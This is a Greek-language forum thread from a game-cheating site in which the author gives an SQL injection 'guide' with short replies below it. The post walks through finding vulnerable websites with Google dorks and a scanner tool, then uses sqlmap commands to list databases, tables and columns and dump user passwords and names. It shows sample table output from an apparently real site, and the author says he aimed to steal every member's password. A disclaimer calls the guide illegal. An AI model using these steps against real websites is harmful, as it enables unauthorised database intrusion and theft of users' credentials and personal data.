Jump to content
MaxCheaters Official Group on Discord
Top.MaxCheaters.com is now OPEN – Lineage 2 Top Listing

[GR]SQL Injection -Guide Part 1+2

~Grey Hat~
 Share

Recommended Posts

~Grey Hat~ Newbie

~Grey Hat~

Posted
Posted

Eiσαγωγη

Καλησπερα σε ολα  τα μελη και χαιρομαι που σας βρισκω μιας και ειναι το πρωτο μου ποστ στο section!

Οπως γραφει και στον τιττλο σημερα θα σας δειξω πως κανω εγω sql injection σε μια ιστοσελιδα και υποκλεπτω αρχεια ,κωδικους κτλπ.!

Tι θα χρειαστουμε?

Για να γινει αυτο θα χρειαστουμε λειτουργικο συστημα BackTrack R1!Eιναι λειτουργικο συστημα των Linux!Μη φοβαστε δεν χρειαζεται να βγαλετε τα windows σας η οτι αλλο χρησημοποιειτε!Θα ανεβασω αργοτερα ενα guide για το πως θα το τρεξετε!

Αρχικα πρεπει να βρουμε αν η σελιδα ειναι ευαλωτη σε επιθεσεις, για να το κανουμε αυτο θα χρειαστουμε καποιο προγραμμα! Παρακατω εχω 2 link με τετοια προγραμματα!

Downloads

 

Dork

 

XCodeExploitScanner

Πληροφοριες

Συνεχιζω...εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες,μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text  το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack

περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google..

Ξεκινωντας Την Διαδικασια

Λοιπον Ανοιγουμε ενα τερματικο στο backtrack και γραφουμε  

cd /pentest/database/sqlmap

,ωστε να ενεργοποιησουμε το sqlmap.Μετα γραφουμε

./sqlmap.py -u [ url ]--beep

πχ 

./sqlmap.py -u http://www.selidathyma.com --beep

Οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα.Συνεχιζω εδω...μετα γραφουμε

./sqlmap.py -u [ url ] --dbs

π.χ 

./sqlmap.py -u http://www.selidathyma.com --dbs

θα μας εμφανισει τα Database πχ

available databases [6]:

[*] dswa

[*] dswa_stage

[*] dswawordpress

[*] information_schema

[*] mysql

[*] test 

./sqlmap.py -u [ url ] --tables -D [database]

μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι

πχ 

./sqlmap.py -u http://www.selidathyma.com --tables -D dswa

 

Database: dswa

[table]

[tr]

[td][104 tables]

+-----------------------------------+

| access                         

| accesslog                   

| actions                       

| actions_aid                 

| advanced_help_index 

| authmap                     

| autologout                   

| batch                           

| blocks                         

| blocks_roles               

| boxes                           

| cache                           

| cache_block                     

| cache_content                   

| cache_filter                     

| cache_form                       

| cache_menu                       

| cache_page                       

| cache_update                     

| cache_views                     

| cache_views_data                 

| comments                         

| content_access                   

| content_field_headername         

| content_group                   

| content_group_fields             

| content_node_field               

| content_node_field_instance     

| content_type_education_center_sub

| content_type_find_alliance       

| content_type_member_home_page   

| content_type_member_page         

| content_type_page               

| content_type_page_ns             

| content_type_story               

| dswa_chapters_main               

| dswa_chapters_persons           

| dswa_eventuity_additional       

| dswa_eventuity_link             

| dswa_eventuity_main             

| dswa_profile_additional         

| dswa_profile_geographic         

| dswa_profile_images             

| dswa_profile_main               

| dswa_store_categories           

| dswa_store_featured             

| dswa_store_featured_sample       

| dswa_store_images               

| dswa_store_product_categories   

| dswa_store_products             

| dswa_taq_articles               

| dswa_taq_quotes                 

| dswa_taq_tips                   

| dswa_taq_topics                 

| dswa_teleclasses_additional     

| dswa_teleclasses_main           

| dswa_teleclasses_speakers       

| dswa_whatsnew_main               

| dswa_whatsnew_order             

| fckeditor_role                   

| fckeditor_settings               

| files                           

| filter_formats                   

| filters                         

| flood                           

| history                         

| menu_custom                     

| menu_links                       

| menu_router                     

| node                             

| node_access                     

| node_comment_statistics         

| node_counter                     

| node_revisions                   

| node_type                       

| performance_detail               

| performance_summary             

| permission                       

| profile_fields                   

| profile_values                   

| role                             

| search_dataset                   

| search_index                     

| search_node_links               

| search_total                     

| semaphore                       

| sessions                         

| system                           

| term_data                       

| term_hierarchy                   

| term_node                       

| term_relation                   

| term_synonym                     

| upload                           

| url_alias                       

| users                           

| users_roles                     

| variable                         

| views_display                   

| views_object_cache               

| views_view                       

| vocabulary                       

| vocabulary_node_types           

| watchdog[/td]

[/tr]

[/table]

./sqlmap.py -u [ url ] --columns -T [table name] -D [databasename]

 

Παραδειγμα 

./sqlmap.py -u http://www.selidathyma.com --columns -T user -D dswa

Και αρχιζει βγαζει  τους users...Αλλο παραδειγμα..

./sqlmap.py -u [ url ] --dump -C [column] -T [table name] -D [databasename]

πχ 

./sqlmap.py -u http://www.selidathyma.com --dump  -C pass -T users -D dswa

πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα 8312631.png  <~~~ τσεκαρετε μια να δειτε.

π.χ 

./sqlmap.py -u http://www.selidathyma.com --dump  -C name -T users -D dswa

, και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα ~~~> 8312648.png

Και ετσι μπορεις να υποκλεψεις στοιχεια απο διαφορες σελιδες..Τα παραπανω χρησημοποιηθηκαν σε δικο μου συστημα..Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα.

Ερχονται καλυτερα ποστ !Ευχαριστω

 

Voqus Newbie

Voqus

Posted
Posted

Ρε φιλε γιατι στον πεοντα κανεις bump εισαι σε tutorial section οχι request.

Εαν ενδιαφερεται καποιος hacking θα κανει reply εδω η θα σε κανει pm.

Jesus.

sτrίkε- Newbie

sτrίkε-

Posted
Posted

Κανω για να ανεβουν λιγο τα ποστ και να επισκεπτοντε περισσοτεροι το section..

Αραξε λιγο φιλαρακο.

Σε καταλαβαινω οτι θελεις να ανεβει το section οπως θα το θελα και εγω, μα με αυτο π κανεις τωρα σκεψου οτι οταν ανεβει θα υπαρχουν αρκετα σχολια του τυπου bump.

 

~Grey Hat~ Newbie

~Grey Hat~

Posted
  • Author
Posted

Αραξε λιγο φιλαρακο.

Σε καταλαβαινω οτι θελεις να ανεβει το section οπως θα το θελα και εγω, μα με αυτο π κανεις τωρα σκεψου οτι οταν ανεβει θα υπαρχουν αρκετα σχολια του τυπου bump.

 

Ok ηταν λαθος! Δεν θα ξαναγινει..Να σου πω , καποιος παιζει με το reputation μου :/ πριν ειχα 1 τωρα 0 ..και νομιζω ξερω ποιος μου το αλλαξε και γιατι...
Celebron Newbie

Celebron

Posted
Posted

Ok ηταν λαθος! Δεν θα ξαναγινει..Να σου πω , καποιος παιζει με το reputation μου :/ πριν ειχα 1 τωρα 0 ..και νομιζω ξερω ποιος μου το αλλαξε και γιατι...

 

http://maxcheaters.com/forum/index.php?action=viewkarma

 

Elfo who else? :S

  • 2 weeks later...
  • 5 months later...
  • 4 weeks later...
  • 3 months later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing


  • Posts

    • Pleyne
      Essence 'mobius' datapack developer

      By Pleyne · Posted

      Looking a datapack developer for 'Essence' - needs to be good with Mobius structure,  Project is using old fork (I think base from crusader). Write Discord to PM.
    • Atom
      [L2J] Origins

      By Atom · Posted

      Good luck!
    • Atom
      The Brutal Truth About Lineage 2 That Will Make You Ragequit

      By Atom · Posted

      We are not back on 2005, life in our days is harder than before, in complection with other things yes, L2 has not the same look.
    • bomarket
      CS2 | Buying skins: up to 98% | Buff/UU Sourcing: 1%

      By bomarket · Posted

      Bump
    • l2-nexus
      L2 Nexus — Website, CMS, Launcher, Java Development for Lin

      By l2-nexus · Posted

      ⚔️ L2 Nexus — Full-Stack Development for Lineage 2 Servers   One team for everything. Website, admin panel, launcher, server development, hosting, protection — built together, working together.   ━━━━━━━━━━━━━━━━━━━━━   SERVICES:   🌐 Server Website Registration, player cabinet, donate shop, statistics, voting, news. Integrated with your server — live data from game DB.   🛡️ Admin Panel (CMS) — 60 Modules Web panel for GM team: bans, kicks, item management, payments, analytics. Battle Pass, marketplace, anti-bot, churn prediction, Discord/Telegram bots.   🚀 Custom Launcher Electron launcher with delta patcher, CDN delivery, news feed, integrity check, multi-server support. Fully branded.   ⚔️ Java Development Custom modules for L2J / aCis / Lucera / L2Off (PTS). Events, NPCs, instances, balance, quests, skills — any complexity.   🛡️ Hosting & DDoS Protection Server setup, OVH Game DDoS, Cloudflare, monitoring 24/7.   ━━━━━━━━━━━━━━━━━━━━━   PRICING (Website + CMS):   Core — €1,000 (one-time) Website + player cabinet + tickets + live status. 30 days support.   Business — €2,500 (one-time) ⭐ + Donate shop, payment systems, admin panel, RBAC, analytics, bots. Custom design. 90 days priority support.   Enterprise — €5,000+ (custom) + Battle Pass, marketplace, anti-bot, churn, economy, backups, Wiki, API. Managed hosting, SLA 99.9%. 12 months support.   ━━━━━━━━━━━━━━━━━━━━━   JAVA DEVELOPMENT:   • PvP Events .............. from €200 • Custom NPCs ............. from €80 • Donate & Economy ........ from €150 • Instance Zones .......... from €300 • Balance & Skills ........ from €100 • Quests .................. from €250 • Olympiad & Sieges ....... from €200 • PTS Extenders ........... from €150 • Bug Fixes ............... from €50/hr • Custom Systems .......... from €500   ━━━━━━━━━━━━━━━━━━━━━   Platforms: L2J · aCis · Lucera · L2Off/PTS Chronicles: Interlude · High Five · Classic · Essence 📍 Live CMS demo available — message us on Telegram   Telegram: @l2nexus Website: https://l2-nexus.com

  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..